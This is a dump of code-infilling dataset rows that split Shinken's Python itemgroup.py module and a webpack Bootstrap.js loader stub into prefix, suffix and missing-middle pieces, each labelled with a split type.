def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', []) |
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop): | random_line_split |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
|
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b | identifier_body |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
|
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| self.members = [] | conditional_block |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def | (self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| __delitem__ | identifier_name |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ }
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
|
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | module.exports = __webpack_require__(2); | random_line_split |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) |
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
module.exports = __webpack_require__(2);
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ } | conditional_block |
Bootstrap.js | /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/
/******/ // The require function
/******/ function | (moduleId) {
/******/
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ i: moduleId,
/******/ l: false,
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ // Flag the module as loaded
/******/ module.l = true;
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/******/
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/
/******/ // identity function for calling harmony imports with the correct context
/******/ __webpack_require__.i = function(value) { return value; };
/******/
/******/ // define getter function for harmony exports
/******/ __webpack_require__.d = function(exports, name, getter) {
/******/ if(!__webpack_require__.o(exports, name)) {
/******/ Object.defineProperty(exports, name, {
/******/ configurable: false,
/******/ enumerable: true,
/******/ get: getter
/******/ });
/******/ }
/******/ };
/******/
/******/ // getDefaultExport function for compatibility with non-harmony modules
/******/ __webpack_require__.n = function(module) {
/******/ var getter = module && module.__esModule ?
/******/ function getDefault() { return module['default']; } :
/******/ function getModuleExports() { return module; };
/******/ __webpack_require__.d(getter, 'a', getter);
/******/ return getter;
/******/ };
/******/
/******/ // Object.prototype.hasOwnProperty.call
/******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/
/******/ // Load entry module and return exports
/******/ return __webpack_require__(__webpack_require__.s = 4);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */,
/* 1 */,
/* 2 */
/***/ (function(module, exports) {
// removed by extract-text-webpack-plugin
/***/ }),
/* 3 */,
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
module.exports = __webpack_require__(2);
/***/ })
/******/ ]);
//# sourceMappingURL=Bootstrap.js.map | __webpack_require__ | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.